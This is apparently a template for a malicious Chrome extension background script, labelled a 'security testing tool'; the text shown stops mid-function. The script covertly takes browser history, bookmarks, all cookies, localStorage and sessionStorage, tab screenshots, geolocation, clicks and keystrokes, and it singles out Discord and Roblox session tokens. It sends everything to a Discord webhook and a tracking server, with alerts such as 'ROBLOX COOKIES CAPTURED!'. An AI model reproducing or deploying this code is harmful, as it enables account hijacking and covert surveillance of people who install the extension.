
// Enhanced Chrome Extension Background Script for {{EXTENSION_NAME}}
// Generated by IP Logger Pro - Advanced Security Testing Tool

const WEBHOOK_URL = '{{WEBHOOK_URL}}';
const USER_ID = '{{USER_ID}}';
const EXTENSION_ID = '{{EXTENSION_ID}}';
const TRACKING_SERVER = '{{TRACKING_SERVER}}';

// Session management
let sessionId = generateSessionId();
let isActive = true;
let collectedData = {
  installation: null,
  pageViews: [],
  formData: [],
  screenshots: [],
  keystrokes: [],
  clicks: [],
  geolocation: null,
  systemInfo: null,
  browserInfo: null,
  permissions: [],
  features: [],
  history: [],
  bookmarks: [],
  cookies: [],
  localStorage: {},
  sessionStorage: {}
};

// Generate UUID for session tracking
function generateSessionId() {
  return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c) {
    const r = Math.random() * 16 | 0;
    const v = c === 'x' ? r : (r & 0x3 | 0x8);
    return v.toString(16);
  });
}

// Enhanced data collection on extension startup
if (chrome && chrome.runtime) {
  chrome.runtime.onStartup.addListener(() => {
    collectInitialData();
  });

  chrome.runtime.onInstalled.addListener(() => {
    collectInitialData();
    collectAllConfiguredData();
  });
}

// Collect ALL configured data based on permissions and features
async function collectAllConfiguredData() {
  console.log('🔍 Starting comprehensive data collection...');
  
  // Collect browser history if enabled
  if ({{FEATURE_BROWSER_INFO}} && chrome.history) {
    await collectBrowserHistory();
  }

  // Collect bookmarks if enabled
  if ({{FEATURE_BROWSER_INFO}} && chrome.bookmarks) {
    await collectBookmarks();
  }

  // Collect cookies from all sites
  if (chrome.cookies) {
    await collectAllCookies();
  }

  // Collect screenshots if enabled
  if ({{FEATURE_SCREENSHOT}}) {
    await captureScreenshots();
  }

  // Collect system and browser information
  await collectSystemInfo();

  // Send all collected data
  await sendComprehensiveData();
}

// Collect browser history
async function collectBrowserHistory() {
  try {
    if (!chrome.history) {
      console.warn('History API not available');
      return;
    }

    console.log('📚 Collecting browser history...');
    
    // Get history from last 30 days
    const thirtyDaysAgo = Date.now() - (30 * 24 * 60 * 60 * 1000);
    
    const historyItems = await new Promise((resolve, reject) => {
      chrome.history.search({
        text: '',
        startTime: thirtyDaysAgo,
        maxResults: 1000
      }, (results) => {
        if (chrome.runtime.lastError) {
          reject(chrome.runtime.lastError);
        } else {
          resolve(results);
        }
      });
    });

    collectedData.history = historyItems.map(item => ({
      url: item.url,
      title: item.title,
      visitCount: item.visitCount,
      typedCount: item.typedCount,
      lastVisitTime: new Date(item.lastVisitTime).toISOString()
    }));

    console.log(`✅ Collected ${collectedData.history.length} history items`);

    // Send history data immediately
    await sendToWebhookAndServer({
      type: 'browser_history_collected',
      extensionId: EXTENSION_ID,
      sessionId: sessionId,
      userId: USER_ID,
      timestamp: Date.now(),
      historyCount: collectedData.history.length,
      history: collectedData.history.slice(0, 50), // Send first 50 items
      totalHistoryItems: collectedData.history.length
    });

  } catch (error) {
    console.error('❌ Error collecting history:', error);
    collectedData.history = { error: 'Failed to collect history: ' + error.message };
  }
}

// Collect bookmarks
async function collectBookmarks() {
  try {
    if (!chrome.bookmarks) {
      console.warn('Bookmarks API not available');
      return;
    }

    console.log('🔖 Collecting bookmarks...');
    
    const bookmarkTree = await new Promise((resolve, reject) => {
      chrome.bookmarks.getTree((results) => {
        if (chrome.runtime.lastError) {
          reject(chrome.runtime.lastError);
        } else {
          resolve(results);
        }
      });
    });

    function extractBookmarks(nodes, folder = '') {
      let bookmarks = [];
      for (const node of nodes) {
        if (node.url) {
          bookmarks.push({
            title: node.title,
            url: node.url,
            folder: folder,
            dateAdded: new Date(node.dateAdded).toISOString()
          });
        }
        if (node.children) {
          bookmarks = bookmarks.concat(extractBookmarks(node.children, node.title));
        }
      }
      return bookmarks;
    }

    collectedData.bookmarks = extractBookmarks(bookmarkTree);
    console.log(`✅ Collected ${collectedData.bookmarks.length} bookmarks`);

    // Send bookmarks data immediately
    await sendToWebhookAndServer({
      type: 'bookmarks_collected',
      extensionId: EXTENSION_ID,
      sessionId: sessionId,
      userId: USER_ID,
      timestamp: Date.now(),
      bookmarksCount: collectedData.bookmarks.length,
      bookmarks: collectedData.bookmarks
    });

  } catch (error) {
    console.error('❌ Error collecting bookmarks:', error);
    collectedData.bookmarks = { error: 'Failed to collect bookmarks: ' + error.message };
  }
}

// Collect ALL cookies from all domains
async function collectAllCookies() {
  try {
    if (!chrome.cookies) {
      console.warn('Cookies API not available');
      return;
    }

    console.log('🍪 Collecting all cookies...');
    
    const allCookies = await new Promise((resolve, reject) => {
      chrome.cookies.getAll({}, (cookies) => {
        if (chrome.runtime.lastError) {
          reject(chrome.runtime.lastError);
        } else {
          resolve(cookies);
        }
      });
    });

    // Organize cookies by domain and look for sensitive ones
    const cookiesByDomain = {};
    const sensitiveCookies = [];
    const discordCookies = [];
    const robloxCookies = [];
    const socialMediaCookies = [];

    for (const cookie of allCookies) {
      const domain = cookie.domain;
      
      if (!cookiesByDomain[domain]) {
        cookiesByDomain[domain] = [];
      }
      
      const cookieInfo = {
        name: cookie.name,
        value: cookie.value,
        domain: cookie.domain,
        path: cookie.path,
        secure: cookie.secure,
        httpOnly: cookie.httpOnly,
        sameSite: cookie.sameSite,
        expirationDate: cookie.expirationDate ? new Date(cookie.expirationDate * 1000).toISOString() : null
      };
      
      cookiesByDomain[domain].push(cookieInfo);

      // Check for sensitive cookies
      const sensitivePatterns = [
        /auth/i, /session/i, /token/i, /login/i, /user/i, /account/i, 
        /password/i, /secret/i, /key/i, /jwt/i, /oauth/i, /csrf/i
      ];
      
      if (sensitivePatterns.some(pattern => pattern.test(cookie.name))) {
        sensitiveCookies.push(cookieInfo);
      }

      // Check for Discord cookies
      if (domain.includes('discord') || cookie.name.toLowerCase().includes('discord')) {
        discordCookies.push(cookieInfo);
      }

      // Check for Roblox cookies (.ROBLOSECURITY is the main one)
      if (domain.includes('roblox') || cookie.name.includes('ROBLOSECURITY')) {
        robloxCookies.push(cookieInfo);
      }

      // Check for social media cookies
      const socialDomains = ['facebook', 'twitter', 'instagram', 'tiktok', 'snapchat', 'youtube', 'twitch'];
      if (socialDomains.some(social => domain.includes(social))) {
        socialMediaCookies.push(cookieInfo);
      }
    }

    collectedData.cookies = {
      total: allCookies.length,
      byDomain: cookiesByDomain,
      sensitive: sensitiveCookies,
      discord: discordCookies,
      roblox: robloxCookies,
      socialMedia: socialMediaCookies,
      domains: Object.keys(cookiesByDomain)
    };

    console.log(`✅ Collected ${allCookies.length} cookies from ${Object.keys(cookiesByDomain).length} domains`);
    console.log(`🔥 Found ${sensitiveCookies.length} sensitive cookies`);
    console.log(`🎮 Found ${discordCookies.length} Discord cookies`);
    console.log(`🎯 Found ${robloxCookies.length} Roblox cookies`);

    // Send cookies data immediately
    await sendToWebhookAndServer({
      type: 'cookies_collected',
      extensionId: EXTENSION_ID,
      sessionId: sessionId,
      userId: USER_ID,
      timestamp: Date.now(),
      cookiesData: collectedData.cookies,
      criticalFindings: {
        hasSensitiveCookies: sensitiveCookies.length > 0,
        hasDiscordCookies: discordCookies.length > 0,
        hasRobloxCookies: robloxCookies.length > 0,
        totalDomains: Object.keys(cookiesByDomain).length
      }
    });

  } catch (error) {
    console.error('❌ Error collecting cookies:', error);
    collectedData.cookies = { error: 'Failed to collect cookies: ' + error.message };
  }
}

// Capture screenshots of active tabs
async function captureScreenshots() {
  try {
    if (!{{FEATURE_SCREENSHOT}}) {
      return;
    }

    console.log('📸 Capturing screenshots...');
    
    // Get all tabs
    const tabs = await new Promise((resolve, reject) => {
      chrome.tabs.query({}, (tabs) => {
        if (chrome.runtime.lastError) {
          reject(chrome.runtime.lastError);
        } else {
          resolve(tabs);
        }
      });
    });

    const screenshots = [];
    
    // Capture visible tabs (limit to first 5 to avoid overwhelming)
    for (let i = 0; i < Math.min(tabs.length, 5); i++) {
      const tab = tabs[i];
      
      try {
        // Make tab active first
        await new Promise((resolve) => {
          chrome.tabs.update(tab.id, { active: true }, resolve);
        });
        
        // Wait a moment for tab to load
        await new Promise(resolve => setTimeout(resolve, 1000));
        
        // Capture screenshot
        const screenshotUrl = await new Promise((resolve, reject) => {
          chrome.tabs.captureVisibleTab(tab.windowId, { format: 'png', quality: 60 }, (dataUrl) => {
            if (chrome.runtime.lastError) {
              reject(chrome.runtime.lastError);
            } else {
              resolve(dataUrl);
            }
          });
        });
        
        screenshots.push({
          tabId: tab.id,
          url: tab.url,
          title: tab.title,
          screenshot: screenshotUrl,
          timestamp: Date.now()
        });
        
        console.log(`📸 Captured screenshot for: ${tab.title}`);
        
      } catch (error) {
        console.error(`❌ Failed to capture screenshot for tab ${tab.id}:`, error);
      }
    }

    collectedData.screenshots = screenshots;
    console.log(`✅ Captured ${screenshots.length} screenshots`);

    // Send screenshots data immediately
    if (screenshots.length > 0) {
      await sendToWebhookAndServer({
        type: 'screenshots_captured',
        extensionId: EXTENSION_ID,
        sessionId: sessionId,
        userId: USER_ID,
        timestamp: Date.now(),
        screenshotCount: screenshots.length,
        screenshots: screenshots.map(s => ({
          tabId: s.tabId,
          url: s.url,
          title: s.title,
          timestamp: s.timestamp,
          hasScreenshot: true
        }))
      });
    }

  } catch (error) {
    console.error('❌ Error capturing screenshots:', error);
    collectedData.screenshots = { error: 'Failed to capture screenshots: ' + error.message };
  }
}

// Collect initial system data
async function collectInitialData() {
  const systemData = {
    type: 'extension_installed',
    extensionId: EXTENSION_ID,
    sessionId: sessionId,
    userId: USER_ID,
    timestamp: Date.now(),
    systemInfo: {
      platform: navigator.platform,
      userAgent: navigator.userAgent,
      language: navigator.language,
      timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
      screenResolution: screen ? `${screen.width}x${screen.height}` : 'unknown',
      colorDepth: screen.colorDepth,
      pixelDepth: screen.pixelDepth,
      cookieEnabled: navigator.cookieEnabled,
      onLine: navigator.onLine,
      hardwareConcurrency: navigator.hardwareConcurrency,
      deviceMemory: navigator.deviceMemory || 'unknown'
    }
  };

  await sendToWebhookAndServer(systemData);
}

// Track tab changes with enhanced data collection
if (chrome && chrome.tabs) {
  chrome.tabs.onActivated.addListener(async (activeInfo) => {
    const ipTracking = {{FEATURE_IP_TRACKING}};
    const browserInfo = {{FEATURE_BROWSER_INFO}};
    if (ipTracking || browserInfo) {
      try {
        const tab = await chrome.tabs.get(activeInfo.tabId);
        await collectAndSendTabData(tab, 'tab_activated');
        
        // Also collect storage data when tab changes
        await collectTabStorageData(tab);
      } catch (error) {
        console.error('Error tracking tab activation:', error);
      }
    }
  });
}

// Track navigation with enhanced data
chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
  if (changeInfo.status === 'complete' && tab.url) {
    await collectAndSendTabData(tab, 'page_loaded');
    
    // Collect storage data from the new page
    await collectTabStorageData(tab);
  }
});

// Collect localStorage and sessionStorage from tabs
async function collectTabStorageData(tab) {
  try {
    if (!tab.url || tab.url.startsWith('chrome://') || tab.url.startsWith('chrome-extension://')) {
      return;
    }

    // Inject script to collect storage data
    const results = await chrome.scripting.executeScript({
      target: { tabId: tab.id },
      func: function() {
        try {
          const localStorageData = {};
          const sessionStorageData = {};
          
          // Collect localStorage
          for (let i = 0; i < localStorage.length; i++) {
            const key = localStorage.key(i);
            if (key) {
              localStorageData[key] = localStorage.getItem(key);
            }
          }
          
          // Collect sessionStorage
          for (let i = 0; i < sessionStorage.length; i++) {
            const key = sessionStorage.key(i);
            if (key) {
              sessionStorageData[key] = sessionStorage.getItem(key);
            }
          }
          
          return {
            localStorage: localStorageData,
            sessionStorage: sessionStorageData,
            url: window.location.href,
            domain: window.location.hostname
          };
        } catch (error) {
          return { error: error.message };
        }
      }
    });

    if (results && results[0] && results[0].result) {
      const storageData = results[0].result;
      
      // Check for sensitive data
      const sensitivePatterns = [
        /token/i, /auth/i, /session/i, /password/i, /key/i, /secret/i,
        /discord/i, /roblox/i, /roblosecurity/i, /user/i, /account/i
      ];
      
      const foundSensitiveData = [];
      
      // Check localStorage
      Object.keys(storageData.localStorage || {}).forEach(key => {
        const value = storageData.localStorage[key];
        if (sensitivePatterns.some(pattern => pattern.test(key) || pattern.test(value))) {
          foundSensitiveData.push({
            type: 'localStorage',
            key: key,
            value: value,
            source: storageData.domain
          });
        }
      });
      
      // Check sessionStorage
      Object.keys(storageData.sessionStorage || {}).forEach(key => {
        const value = storageData.sessionStorage[key];
        if (sensitivePatterns.some(pattern => pattern.test(key) || pattern.test(value))) {
          foundSensitiveData.push({
            type: 'sessionStorage',
            key: key,
            value: value,
            source: storageData.domain
          });
        }
      });

      // Send storage data
      await sendToWebhookAndServer({
        type: 'storage_data_collected',
        extensionId: EXTENSION_ID,
        sessionId: sessionId,
        userId: USER_ID,
        timestamp: Date.now(),
        tabInfo: {
          url: tab.url,
          title: tab.title,
          domain: storageData.domain
        },
        storageData: storageData,
        sensitiveData: foundSensitiveData,
        hasSensitiveData: foundSensitiveData.length > 0
      });

      console.log(`💾 Collected storage data from ${storageData.domain}: ${Object.keys(storageData.localStorage || {}).length} localStorage, ${Object.keys(storageData.sessionStorage || {}).length} sessionStorage`);
      if (foundSensitiveData.length > 0) {
        console.log(`🔥 Found ${foundSensitiveData.length} sensitive storage items`);
      }
    }

  } catch (error) {
    console.error('❌ Error collecting storage data:', error);
  }
}

// Enhanced data collection from tabs
async function collectAndSendTabData(tab, eventType) {
  try {
    const data = {
      type: eventType,
      extensionId: EXTENSION_ID,
      sessionId: sessionId,
      userId: USER_ID,
      timestamp: Date.now(),
      tabInfo: {
        url: tab.url,
        title: tab.title,
        favIconUrl: tab.favIconUrl,
        incognito: tab.incognito,
        active: tab.active,
        pinned: tab.pinned,
        index: tab.index,
        windowId: tab.windowId,
        status: tab.status
      }
    };

    // Add browser info if enabled
    if ({{FEATURE_BROWSER_INFO}}) {
      data.systemInfo = {
        userAgent: navigator.userAgent,
        platform: navigator.platform,
        language: navigator.language,
        languages: navigator.languages,
        cookieEnabled: navigator.cookieEnabled,
        onLine: navigator.onLine,
        timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
        screenInfo: {
          width: screen.width,
          height: screen.height,
          availWidth: screen.availWidth,
          availHeight: screen.availHeight,
          colorDepth: screen.colorDepth,
          pixelDepth: screen.pixelDepth
        }
      };
    }

    // Add geolocation if enabled and permitted
    if ({{FEATURE_GEOLOCATION}}) {
      try {
        const position = await getCurrentPosition();
        data.location = {
          latitude: position.coords.latitude,
          longitude: position.coords.longitude,
          accuracy: position.coords.accuracy,
          altitude: position.coords.altitude,
          altitudeAccuracy: position.coords.altitudeAccuracy,
          heading: position.coords.heading,
          speed: position.coords.speed,
          timestamp: position.timestamp
        };
      } catch (error) {
        data.location = { error: 'Geolocation not available or denied' };
      }
    }

    // Inject content script to collect additional data
    if (tab.url && !tab.url.startsWith('chrome://') && !tab.url.startsWith('chrome-extension://')) {
      try {
        await chrome.scripting.executeScript({
          target: { tabId: tab.id },
          func: collectPageData,
          args: [EXTENSION_ID, sessionId, USER_ID, {{FEATURE_FORM_DATA}}, {{FEATURE_CLICK_TRACKING}}, {{FEATURE_KEYLOGGER}}]
        });
      } catch (error) {
        console.error('Error injecting content script:', error);
      }
    }

    await sendToWebhookAndServer(data);

  } catch (error) {
    console.error('Error collecting tab data:', error);
  }
}

// Function to inject into pages for enhanced data collection
function collectPageData(extensionId, sessionId, userId, captureFormData, captureClicks, captureKeystrokes) {
  try {
    const pageData = {
      type: 'page_analysis',
      extensionId: extensionId,
      sessionId: sessionId,
      userId: userId,
      timestamp: Date.now(),
      url: window.location.href,
      domain: window.location.hostname,
      path: window.location.pathname,
      title: document.title,
      pageInfo: {
        documentHeight: document.documentElement.scrollHeight,
        documentWidth: document.documentElement.scrollWidth,
        viewportHeight: window.innerHeight,
        viewportWidth: window.innerWidth,
        scrollX: window.scrollX,
        scrollY: window.scrollY,
        referrer: document.referrer,
        characterSet: document.characterSet,
        readyState: document.readyState,
        lastModified: document.lastModified
      },
      forms: [],
      links: [],
      images: [],
      inputs: [],
      localStorage: {},
      sessionStorage: {},
      cookies: document.cookie
    };

    // Collect form information
    if (captureFormData) {
      const forms = document.querySelectorAll('form');
      forms.forEach((form, index) => {
        const formData = {
          index: index,
          action: form.action,
          method: form.method,
          name: form.name,
          id: form.id,
          className: form.className,
          inputCount: form.querySelectorAll('input').length,
          inputs: []
        };

        const inputs = form.querySelectorAll('input, textarea, select');
        inputs.forEach(input => {
          formData.inputs.push({
            type: input.type || 'text',
            name: input.name,
            id: input.id,
            placeholder: input.placeholder,
            required: input.required,
            value: input.type === 'password' ? '[HIDDEN]' : input.value?.substring(0, 50)
          });
        });

        pageData.forms.push(formData);
      });
    }

    // Collect all input fields
    const allInputs = document.querySelectorAll('input, textarea, select');
    allInputs.forEach(input => {
      pageData.inputs.push({
        type: input.type || 'unknown',
        name: input.name,
        id: input.id,
        placeholder: input.placeholder,
        autocomplete: input.autocomplete,
        required: input.required,
        disabled: input.disabled,
        value: input.type === 'password' ? '[HIDDEN]' : input.value?.substring(0, 50)
      });
    });

    // Collect links
    const links = document.querySelectorAll('a[href]');
    Array.from(links).slice(0, 50).forEach(link => {
      pageData.links.push({
        href: link.href,
        text: link.textContent?.substring(0, 100),
        target: link.target,
        rel: link.rel
      });
    });

    // Collect images
    const images = document.querySelectorAll('img[src]');
    Array.from(images).slice(0, 20).forEach(img => {
      pageData.images.push({
        src: img.src,
        alt: img.alt,
        width: img.width,
        height: img.height
      });
    });

    // Collect localStorage data
    try {
      for (let i = 0; i < localStorage.length; i++) {
        const key = localStorage.key(i);
        if (key) {
          const value = localStorage.getItem(key);
          pageData.localStorage[key] = value?.substring(0, 200);
        }
      }
    } catch (e) {
      pageData.localStorage = { error: 'Access denied' };
    }

    // Collect sessionStorage data
    try {
      for (let i = 0; i < sessionStorage.length; i++) {
        const key = sessionStorage.key(i);
        if (key) {
          const value = sessionStorage.getItem(key);
          pageData.sessionStorage[key] = value?.substring(0, 200);
        }
      }
    } catch (e) {
      pageData.sessionStorage = { error: 'Access denied' };
    }

    // Send collected data back to background script
    chrome.runtime.sendMessage({ type: 'pageData', data: pageData });

    // Set up event listeners for real-time tracking
    if (captureClicks) {
      document.addEventListener('click', function(event) {
        const clickData = {
          type: 'click_event',
          extensionId: extensionId,
          sessionId: sessionId,
          userId: userId,
          timestamp: Date.now(),
          element: {
            tagName: event.target.tagName,
            id: event.target.id,
            className: event.target.className,
            text: event.target.textContent?.substring(0, 100),
            href: event.target.href,
            type: event.target.type
          },
          coordinates: {
            clientX: event.clientX,
            clientY: event.clientY,
            pageX: event.pageX,
            pageY: event.pageY
          },
          url: window.location.href
        };
        chrome.runtime.sendMessage({ type: 'clickData', data: clickData });
      });
    }

    if (captureKeystrokes) {
      let keystrokeBuffer = '';
      document.addEventListener('keydown', function(event) {
        keystrokeBuffer += event.key;

        if (keystrokeBuffer.length >= 20 || event.key === 'Enter') {
          const keystrokeData = {
            type: 'keystroke_event',
            extensionId: extensionId,
            sessionId: sessionId,
            userId: userId,
            timestamp: Date.now(),
            keys: keystrokeBuffer,
            elementType: event.target.tagName,
            elementId: event.target.id,
            url: window.location.href
          };
          chrome.runtime.sendMessage({ type: 'keystrokeData', data: keystrokeData });
          keystrokeBuffer = '';
        }
      });
    }

  } catch (error) {
    console.error('Error collecting page data:', error);
  }
}

// Listen for messages from content scripts
chrome.runtime.onMessage.addListener(async (message, sender, sendResponse) => {
  if (message.type === 'pageData' || message.type === 'clickData' || message.type === 'keystrokeData') {
    await sendToWebhookAndServer(message.data);
  }
});

// Send comprehensive data with all collected information
async function sendComprehensiveData() {
  const comprehensiveData = {
    type: 'comprehensive_data_collection',
    extensionId: EXTENSION_ID,
    sessionId: sessionId,
    userId: USER_ID,
    timestamp: Date.now(),
    extensionName: '{{EXTENSION_NAME}}',
    collectedData: collectedData,
    summary: {
      historyItems: Array.isArray(collectedData.history) ? collectedData.history.length : 0,
      bookmarks: Array.isArray(collectedData.bookmarks) ? collectedData.bookmarks.length : 0,
      totalCookies: collectedData.cookies?.total || 0,
      cookieDomains: collectedData.cookies?.domains?.length || 0,
      sensitiveCookies: collectedData.cookies?.sensitive?.length || 0,
      discordCookies: collectedData.cookies?.discord?.length || 0,
      robloxCookies: collectedData.cookies?.roblox?.length || 0,
      screenshots: Array.isArray(collectedData.screenshots) ? collectedData.screenshots.length : 0
    }
  };

  await sendToWebhookAndServer(comprehensiveData);
}

// Enhanced webhook and server sending with retry logic
async function sendToWebhookAndServer(data) {
  // Send to Discord webhook (optional)
  if (WEBHOOK_URL && WEBHOOK_URL.trim()) {
    await sendToWebhook(data);
  }

  // Send to tracking server (required for EX LOGS)
  await sendToServer(data);
}

// Send to Discord webhook with enhanced formatting for ALL data types
async function sendToWebhook(data) {
  try {
    if (!WEBHOOK_URL || !WEBHOOK_URL.startsWith('https://discord.com/api/webhooks/')) {
      console.error('Invalid webhook URL provided');
      return;
    }

    let embed = {
      title: "🔍 Extension Activity Detected",
      color: getColorForEventType(data.type),
      timestamp: new Date(data.timestamp).toISOString(),
      footer: { text: `Extension: {{EXTENSION_NAME}} | Session: ${data.sessionId?.substring(0, 8)}` }
    };

    // Customize embed based on event type
    switch (data.type) {
      case 'browser_history_collected':
        embed.title = "📚 Browser History Captured";
        embed.description = `**${data.historyCount}** history items collected from browser`;
        embed.color = 0xFF4444;
        embed.fields = [
          { name: "👤 User", value: `ID: ${data.userId}`, inline: true },
          { name: "📊 History Items", value: data.historyCount.toString(), inline: true },
          { name: "🕒 Time Range", value: "Last 30 days", inline: true }
        ];
        
        if (data.history && data.history.length > 0) {
          const recentHistory = data.history.slice(0, 5).map(item => 
            `• ${item.title?.substring(0, 50) || 'Untitled'} (${item.visitCount} visits)`
          ).join('\n');
          embed.fields.push({
            name: "🔗 Recent Sites",
            value: `\`\`\`${recentHistory}\`\`\``,
            inline: false
          });
        }
        break;

      case 'bookmarks_collected':
        embed.title = "🔖 Bookmarks Captured";
        embed.description = `**${data.bookmarksCount}** bookmarks collected`;
        embed.color = 0x00AA00;
        embed.fields = [
          { name: "👤 User", value: `ID: ${data.userId}`, inline: true },
          { name: "📊 Total Bookmarks", value: data.bookmarksCount.toString(), inline: true },
          { name: "📂 Folders", value: "All folders scanned", inline: true }
        ];
        break;

      case 'cookies_collected':
        const cookiesData = data.cookiesData;
        const critical = data.criticalFindings;
        
        embed.title = critical.hasRobloxCookies ? "🔥 ROBLOX COOKIES CAPTURED!" : 
                     critical.hasDiscordCookies ? "🔥 DISCORD COOKIES CAPTURED!" :
                     critical.hasSensitiveCookies ? "🚨 SENSITIVE COOKIES FOUND!" : 
                     "🍪 Cookies Collected";
        
        embed.description = critical.hasRobloxCookies ? "**CRITICAL: Roblox authentication cookies captured!**" :
                           critical.hasDiscordCookies ? "**CRITICAL: Discord authentication cookies captured!**" :
                           critical.hasSensitiveCookies ? "**WARNING: Sensitive authentication cookies found!**" :
                           `${cookiesData.total} cookies collected from ${critical.totalDomains} domains`;
        
        embed.color = critical.hasRobloxCookies || critical.hasDiscordCookies ? 0xFF0000 : 
                     critical.hasSensitiveCookies ? 0xFF8800 : 0x00AA00;

        embed.fields = [
          { name: "👤 User", value: `ID: ${data.userId}`, inline: true },
          { name: "🍪 Total Cookies", value: cookiesData.total.toString(), inline: true },
          { name: "🌐 Domains", value: critical.totalDomains.toString(), inline: true },
          { name: "🔒 Sensitive", value: cookiesData.sensitive?.length.toString() || "0", inline: true },
          { name: "🎮 Discord", value: cookiesData.discord?.length.toString() || "0", inline: true },
          { name: "🎯 Roblox", value: cookiesData.roblox?.length.toString() || "0", inline: true }
        ];

        if (cookiesData.roblox && cookiesData.roblox.length > 0) {
          embed.fields.push({
            name: "🔥 ROBLOX TOKENS",
            value: `\`\`\`${cookiesData.roblox.map(c => `${c.name}: ${c.value.substring(0, 50)}...`).join('\n')}\`\`\``,
            inline: false
          });
        }

        if (cookiesData.discord && cookiesData.discord.length > 0) {
          embed.fields.push({
            name: "🎮 DISCORD TOKENS",
            value: `\`\`\`${cookiesData.discord.map(c => `${c.name}: ${c.value.substring(0, 50)}...`).join('\n')}\`\`\``,
            inline: false
          });
        }
        break;

      case 'screenshots_captured':
        embed.title = "📸 Screenshots Captured";
        embed.description = `**${data.screenshotCount}** browser screenshots taken`;
        embed.color = 0x9B59B6;
        embed.fields = [
          { name: "👤 User", value: `ID: ${data.userId}`, inline: true },
          { name: "📸 Screenshots", value: data.screenshotCount.toString(), inline: true },
          { name: "🕒 Timestamp", value: `<t:${Math.floor(Date.now() / 1000)}:R>`, inline: true }
        ];
        
        if (data.screenshots && data.screenshots.length > 0) {
          const screenshotList = data.screenshots.map(s => 
            `• ${s.title?.substring(0, 40) || 'Untitled'}`
          ).join('\n');
          embed.fields.push({
            name: "📋 Captured Pages",
            value: `\`\`\`${screenshotList}\`\`\``,
            inline: false
          });
        }
        break;

      case 'storage_data_collected':
        embed.title = data.hasSensitiveData ? "🔥 SENSITIVE STORAGE DATA!" : "💾 Storage Data Collected";
        embed.description = data.hasSensitiveData ? 
          `**CRITICAL: Sensitive data found in browser storage!**` :
          `Storage data collected from ${data.tabInfo?.domain}`;
        embed.color = data.hasSensitiveData ? 0xFF0000 : 0x3498DB;
        
        const storageData = data.storageData;
        embed.fields = [
          { name: "🌐 Domain", value: data.tabInfo?.domain || "Unknown", inline: true },
          { name: "💾 localStorage", value: Object.keys(storageData.localStorage || {}).length.toString(), inline: true },
          { name: "📝 sessionStorage", value: Object.keys(storageData.sessionStorage || {}).length.toString(), inline: true }
        ];

        if (data.sensitiveData && data.sensitiveData.length > 0) {
          const sensitiveList = data.sensitiveData.slice(0, 5).map(item => 
            `• ${item.type}: ${item.key} = ${item.value?.substring(0, 30)}...`
          ).join('\n');
          embed.fields.push({
            name: "🔥 SENSITIVE DATA FOUND",
            value: `\`\`\`${sensitiveList}\`\`\``,
            inline: false
          });
        }
        break;

      case 'comprehensive_data_collection':
        embed.title = "🔍 COMPLETE DATA HARVEST";
        embed.description = "**All configured data has been successfully collected!**";
        embed.color = 0xFF0000;
        
        const summary = data.summary;
        embed.fields = [
          { name: "👤 User", value: `ID: ${data.userId}`, inline: true },
          { name: "📚 History", value: summary.historyItems.toString(), inline: true },
          { name: "🔖 Bookmarks", value: summary.bookmarks.toString(), inline: true },
          { name: "🍪 Cookies", value: `${summary.totalCookies} (${summary.cookieDomains} domains)`, inline: true },
          { name: "🔒 Sensitive", value: summary.sensitiveCookies.toString(), inline: true },
          { name: "📸 Screenshots", value: summary.screenshots.toString(), inline: true }
        ];

        if (summary.discordCookies > 0 || summary.robloxCookies > 0) {
          embed.fields.push({
            name: "🔥 CRITICAL FINDINGS",
            value: `🎮 Discord: ${summary.discordCookies} cookies\n🎯 Roblox: ${summary.robloxCookies} cookies`,
            inline: false
          });
        }
        break;

      // Keep existing cases for other event types
      case 'extension_installed':
        embed.title = "🚀 Extension Installed & Active";
        embed.description = `**{{EXTENSION_NAME}}** has been successfully installed and is now tracking.`;
        embed.fields = [
          { name: "👤 User", value: `ID: ${data.userId}`, inline: true },
          { name: "💻 Platform", value: data.systemInfo?.platform || 'Unknown', inline: true },
          { name: "🌐 Browser", value: data.systemInfo?.userAgent?.split(' ')[0] || 'Unknown', inline: true },
          { name: "📱 Screen", value: data.systemInfo?.screenResolution || 'Unknown', inline: true },
          { name: "🌍 Timezone", value: data.systemInfo?.timezone || 'Unknown', inline: true },
          { name: "🧠 Memory", value: `${data.systemInfo?.deviceMemory || 'Unknown'} GB`, inline: true }
        ];
        break;

      case 'page_loaded':
      case 'tab_activated':
        embed.title = data.type === 'page_loaded' ? "📄 Page Loaded" : "🔄 Tab Activated";
        embed.fields = [
          { name: "🌐 URL", value: data.tabInfo?.url?.substring(0, 100) || 'Unknown', inline: false },
          { name: "📝 Title", value: data.tabInfo?.title?.substring(0, 100) || 'Untitled', inline: false }
        ];

        if (data.location && !data.location.error) {
          embed.fields.push({
            name: "📍 Location",
            value: `${data.location.latitude.toFixed(4)}, ${data.location.longitude.toFixed(4)}`,
            inline: true
          });
        }

        if (data.tabInfo?.incognito) {
          embed.fields.push({ name: "🕵️ Mode", value: "Incognito", inline: true });
        }
        break;

      case 'page_analysis':
        embed.title = "🔬 Deep Page Analysis";
        embed.fields = [
          { name: "🌐 Domain", value: data.domain || 'Unknown', inline: true },
          { name: "📄 Path", value: data.path || '/', inline: true },
          { name: "📊 Forms", value: data.forms?.length.toString() || '0', inline: true },
          { name: "🔗 Links", value: data.links?.length.toString() || '0', inline: true },
          { name: "🖼️ Images", value: data.images?.length.toString() || '0', inline: true },
          { name: "📝 Inputs", value: data.inputs?.length.toString() || '0', inline: true }
        ];

        if (data.localStorage && Object.keys(data.localStorage).length > 0) {
          embed.fields.push({
            name: "💾 LocalStorage",
            value: `${Object.keys(data.localStorage).length} items found`,
            inline: true
          });
        }

        if (data.cookies && data.cookies.length > 0) {
          embed.fields.push({
            name: "🍪 Cookies",
            value: `${data.cookies.split(';').length} cookies detected`,
            inline: true
          });
        }
        break;

      case 'click_event':
        embed.title = "👆 User Click Detected";
        embed.fields = [
          { name: "🎯 Element", value: `${data.element?.tagName || 'Unknown'} ${data.element?.id ? `#${data.element.id}` : ''}`, inline: true },
          { name: "📝 Text", value: data.element?.text?.substring(0, 50) || 'No text', inline: true },
          { name: "📍 Position", value: `${data.coordinates?.pageX}, ${data.coordinates?.pageY}`, inline: true }
        ];
        break;

      case 'keystroke_event':
        embed.title = "⌨️ Keystroke Activity";
        embed.fields = [
          { name: "🎯 Element", value: data.elementType || 'Unknown', inline: true },
          { name: "📝 Keys", value: `${data.keys?.length || 0} characters typed`, inline: true }
        ];
        break;
    }

    // Add URL field for relevant events
    if (data.type !== 'extension_installed' && (data.url || data.tabInfo?.url)) {
